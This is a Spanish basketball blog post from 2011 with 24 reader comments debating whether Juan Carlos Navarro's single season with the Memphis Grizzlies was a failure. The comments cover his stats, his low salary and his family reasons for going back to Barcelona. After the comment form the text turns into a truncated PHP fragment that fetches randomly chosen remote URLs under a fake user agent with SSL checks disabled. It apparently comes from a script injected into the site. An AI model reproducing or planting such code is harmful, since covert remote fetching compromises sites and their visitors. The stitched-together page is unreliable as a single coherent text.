La pregunta

25 de November de 2011 por txusma

¿Fracasó Juan Carlos Navarro en la NBA?

Comenta

24 comentarios a esta entrada

  1. infante dice:
    #1

    A mi no me parece que se pueda hablar de fracaso, asi como tampoco de exito. Simplemente jugo una temporada, en una liga que no se adapta a sus caracteristicas, y metio sus tiros. Para mi, no se puede hablar de exito o de fracaso en un año, y menos para un jugador incognita como lo fue em su momento

      Citar

  2. Jose Luis dice:
    #2

    Yo creo que para nada fue un fracaso. 30 partidos de titular, casi 11 puntos por partido, 2 rebotes, 2 asistencias por partido, un 36% en triples cuando llegaba a una nueva distancia a la que había que acostumbrarse… para nada lo veo un fracaso, se volvió porque quiso, porque podía haber seguido siendo productivo allí. Yo le veo como una especie de Ray Allen, salvando las distancias, y aunque es cierto que le costaba defender, por su físico, hizo una muy buena campaña para un rookie. La temporada de Navarro fue similar, o mejor, que la primera de Rudy, aquella que fue como “oh dios, Rudy se va a salir”.

      Citar

  3. Viva_Dirk dice:
    #3

    Bueno, la temporada de Navarro fue como fue, para el que lo considerara uno de los mejores escoltas del mundo debio ser una decepción total, pero los que pensabamos que era un buen jugador ofensivo y lamentable defensivamente pasó lo que tenia que pasar, su rol fue el de tirador y anotador en pocos minutos que era lo que mejor le venia.

    A mi me hubiera gustado verlo ir con Pau a los Lakers, Navarro perfectamente podria haber jugado de base/escolta suplente en el triangulo porque con la edad fue ganando inteligencia baloncestistica, habria mejorado a Farmar/Vujacic seguro y no se le habria exigido una gran defensa.

    Asi que, yo creo que no fracasó, simplemente que en el Barça/selección tenia un rol que dado su nivel físico y defensivo para el uno contra uno no podia tener en la NBA.

      Citar

  4. TheDeerHunter dice:
    #4

    Bueno… yo soy de los que creen que la NBA hubiera salido ganando estos años de tener una mente más permeable. No concibo que un jugador de talla contrastada y bien ganada tenga que ir a ganarse el pan como cualquier rookie/jugador de rol cualquiera/temporero de medio pelo.
    Lo de Navarro para mí es más error de la NBA que suyo. Demostró que podía jugar perfectamente allí a pesar de muchos aspectos y prejuicios en su contra pero la NBA no supo aprovecharle como uno de los mejores escoltas del mundo que, para mí, sin lugar a dudas, es.

    La miel de abeja no siempre está hecha para la boca del asno.

    ¿Triunfó en la NBA? Desde luego que no, pero tampoco fracasó. No creo que sea exclusivamente gracias a haber vivido esa experiencia… pero da toda la sensación de que es mejor jugador ahora que antes de irse. Seguramente sí ganó en eficacia.

      Citar

  5. dsromero dice:
    #5

    Como todos habéis dicho antes que yo, no creo que se pueda hablar de fracaso en ningún momento. Ser rookie en la enbiei es difícil para cualquiera pero si eres un tío de veintibastantes años, debilucho, europeo, etc te respetan menos aún si cabe.

    Se volvio por que es un ganador y le gusta jugar por titulos, tener muchos minutos y no ser un jugador de rol, ni más ni menos

      Citar

  6. Diestro dice:
    #6

    Según tenía entendido, se volvió por el ahogamiento financiero que hubiera supuesto seguir, ya que debido la deuda contraída con el Barcelona estaba jugando casi gratis (e incluso según tengo entendido perdiendo dinero).
    No tuvo paciencia ni el ni el Memphis, porque una vez que no se vio con el papel de jugador importante, mas o menos después del parón del All-Star, empezo a pensar en su regreso y en el equipo le empezaron a restar minutos y peso especifico en el equipo.

    Estoy completamente convencido de que la ausencia de éxito de Navarro en la NBA se debió mas a circunstancias económicas/momento vital, que a cualquier otra cosa, no olvidemos que esta gente juega por dinero al fin y al cabo y que tiene unos años para ganarlo.

    Creo que falto paciencia mas que físico o cualidades, ya con las mismas y con un poco de paciencia hubiera sido un jugador muy importante.

    Saludos

      Citar

  7. Viva_Dirk dice:
    #7

    Hombre Deer, ¿tu crees que deberia haber jugado mas? Para mi el maltrato fue puramente económico que ahí si lo tiraron por tierra y lo desprestigiaron. Yo creo que tuvo un rol correcto en Memphis, jugó 26 minutos, anotó 11 puntos y le dieron 9 tiros por noche, yo creo que hizo una muy buena temporada teniendo en cuenta que jugó los 82 partidos y Navarro no destaca precisamente por su físico.

    Jugando en un equipo potente no creo que jugar 35 minutos durante 82 partidos hubiera sido bueno para el. Si se hubiera quedado su rol hubiera sido parecido al de Memphis, como he dicho antes en los Lakers estoy seguro de que hubiera hecho un papelón.

      Citar

  8. TheDeerHunter dice:
    #8

    No es una cuestión de cantidad de minutos.

    Para empezar Navarro va a allí literalmente pagando como se ha dicho. El cuarto salario más bajo en una plantilla donde había cada paquete que te podías morir de asco. No voy a decir nombres por no herir sensibilidades (y por no encenderme porque es para cagarse en algo gordo…)

    ¡Qué narices!!! Tomad y comed:
    1 Kwame Brown $9,075,000
    2 Mike Miller $8,376,194
    3 Darko Milicic $6,500,000
    4 Jason Collins $6,100,000
    5 Brian Cardinal $5,850,000
    6 Damon Stoudamire $4,350,000
    7 Mike Conley $3,377,160
    8 Rudy Gay $2,411,160
    9 Hakim Warrick $1,376,040
    10 Javaris Crittenton $1,285,200
    11 Kyle Lowry $1,087,680
    12 Casey Jacobsen $826,269
    13 Aaron McKie $750,000
    14 Andre Brown $711,517
    15 Marcus Vinicius $687,456
    16 Juan Carlos Navarro $538,090
    17 Jeremy Richardson $511,295
    18 Tarence Kinsey $219,533
    19 Bobby Jones $85,932

    Si en Memphis no hubieran sido en esa época un atajo de descerebrados medio degenerados (empezando por Wallace y acabando por Iavaronni) esa situación de ninguna manera se hubiera gestionado de esa forma. (Que luego hay quien se queja de que Pau se quisiera largar de ese lupanar)

    Dices que 9 tiros es un número adecuado… y son los mismos tiros que se cascaban estrellas de la talla de Hakeem Warrick, mientras Gay disfrutaba de su mediocridad cascándose casi el doble. Pero además los tiros que debía disfrutar Navarro eran de especialista abre-latas-esperabolas cuando todos sabemos que esa es precisamente la punta del iceberg de su juego.

    Para colmo… y esto ya es la repanocha, sin Gasol termina la temporada, e increíblemente lo ha hecho bien (lo poco que le han pedido y le han dejado hacer) y tienen la desfachatez de regatearle un contrato apestoso en medio de una planificación deportiva y un panorama terroríficos. Vamos, que el mejor éxito de la carrera de Navarro fue mandarlos directamente a tomar por culo.

      Citar

  9. Melo15 dice:
    #9

    Lo que es de los mejores escoltas del mundo os lo abeis sacao de la manga no? Porque no se puede ser de los mejores siedo un jugador que no sabe defender

      Citar

  10. TheDeerHunter dice:
    #10

    A mí me parece que no es cierto que Navarro no sepa defender… pero asumiendo que fuera verdad (más por una cuestión física que otra cosa) nunca lo ha echado en falta para destrozar a casi todos los escoltas con los que se ha cruzado en los muchos triunfos (nacionales e internacionales) que ha acumulado.

    A colación de algo así decía Barkley: “Mientras Bird no se retire, seré el 2º peor defensor de la NBA.”
    Ellos tampoco notaban demasiado no ser grandes defensores. Los putos cracks es lo que tienen.

      Citar

  11. Melo15 dice:
    #11

    Pro hombre navarro es una estrella en europa aunque sea de españa y eso tampoco os paseis navarro en la NBA era un triplista que esta muy bien pero ni mucho menos lo podemos comparar con los mejores de la NBA

      Citar

  12. Pop dice:
    #12

    Como si Reggie Miller o Rex Chapman hubiesen sido buenos defensores… Para mí Navarro sí que es de los mejores escoltas del mundo. Su balance total ataque/defensa sale ganando por mucho, y te hace ganar partidos y títulos. Sin contar que, siendo una posición tan individualista, no creo que haya muchos escoltas en la NBA con la visión colectiva que tiene la Bomba.

      Citar

  13. HisRoyalAirness dice:
    #13

    Para mí no fracasó, de ningún modo. Es más me consta que cuando ya había decidido irse le llegaron bastantes ofertas, una de ellas de Lakers y bastante jugosa.
    Lo que tengo claro es que si se hubiera quedado se habría reconvertido un poco en base, más que nada por el tema de alturas y emparejamientos; yo recuerdo verle jugar de 1, subiendo la bola varios partidos y lo hacía cojonudamente.
    Creo que tiene sitio de sobra en la NBA y que lo de que es un defensor malísimo es una exageración, hay miles de All-Star que son igual o peores defensores que Navarro. Recuerdo a ilustres comentaristas yankis flipando con sus recursos ofensivos.
    Si se hubiera quedado y aceptado algún contrato decente en otro equipo ahora mismo creo que sería tipo Manudona, un tipo respetadísimo en la NBA y con algún All-Star a cuestas.
    Me ha extrañado su renovación, siempre dijo que antes de retirarse le gustaría a ir a probar a conseguir un anillo

      Citar

  14. Viva_Dirk dice:
    #14

    Yo no creo que hubiera conseguido de ningun modo un estatus como el de Ginobili, que es mejor en todo que Navarro.

      Citar

  15. Viva_Dirk dice:
    #15

    Ah y que no se me olvide, ni Bird ni Barkley me parecian malos defensores, y en el caso de que lo hubieran sido no hay comparación posible.

      Citar

  16. Esteban dice:
    #16

    obvio q es un fracaso, sin dudas no le fue horrible, pero el mejor tirador de europa de la ultima decada, jugo una temporada y no consiguio un contrato bueno, significa q no andubo bien
    11 puntos en el menphis de esa epoca los hacia cualquiera

      Citar

  17. Esteban dice:
    #17

    por favor, no es comparable desde ningun punto de vista navarro – ginobili
    manu es superior en todas las facetas del juego, incluso cuento con los dedos de una mano los escoltas mejores q ginobili, ellos son KOBE, WADE, y bueno me confundi, solo esos dos

      Citar

  18. HisRoyalAirness dice:
    #18

    Dije lo de de Ginobili como un ejemplo del ROL o tipo de jugador que podía ser en una plantilla, no los he comparado a ambos (aunque tampoco me parece que estén a una distancia sideral, ni mucho menos).

    Y a mí Bird y Barkley no me parecían malos defensores, para nada. Bird un poco lento contra pares más rápidos pero listo como el hambre y con una anticipación para cortar lineas de pase bestial. Barkley siempre me ha parecido un titán, puede que al poste le superaran a veces pero era por temas de envergadura

      Citar

  19. HisRoyalAirness dice:
    #19

    Hay acuerdoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo!!

    Pues eso, empieza la fiesta chicos

      Citar

  20. melo15 dice:
    #20

    Estoi de acuerdo que ai malos defensores en el all-star(melo entre ellos) pero todos ello son unos monstruos es especial melo que es de los 5 mejores jugadores ofensivamente ablando

      Citar

  21. max dice:
    #21

    Tampoco hay que olvidar la situación familiar de Navarro, que creo que también influyó mucho en su decisión de volverse para Barcelona: casado y con dos niñas muy pequeñas (creo). Cuando Pau se fue de Memphis, se quedaron mas solos que la una. Cuando Juan Carlos se iba de gira su familia se quedaba semanas enteras en una ciudad donde no dominaban el idioma ni conocían a nadie. Yo creo que eso fue fundamental para su vuelta, además del aspecto económico.

      Citar

  22. melo15 dice:
    #22

    Bueno un sacrifico que ai que acer para triunfar

      Citar

  23. Txusma dice:
    #23

    En este caso el sacrificio no lo hacía Navarro sinó su familia.

      Citar

  24. Denise dice:
    #24

    ¿Fracaso? Un tío que jugando gratis sin la motivacion de ganar titulos (a lo que está acostumbrado) y aun así estuvo a punto de batir el record de triples de rookies, dio alguna que otra exhibición de tiro (recuerdo 28 puntos y 8 triples vs Hornets), y anotó unos buenos 11 puntos de media. Incluso hizo un doble doble cogiendo 11 rebotes vs Nets.

    Lo de Navarro no es un fracaso. Y si lo es…que me dicen de Sergio Rodriguez, el otrora Spanish Chocolate, sucesor de Nash entre otras idioteces que le pusieron???

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>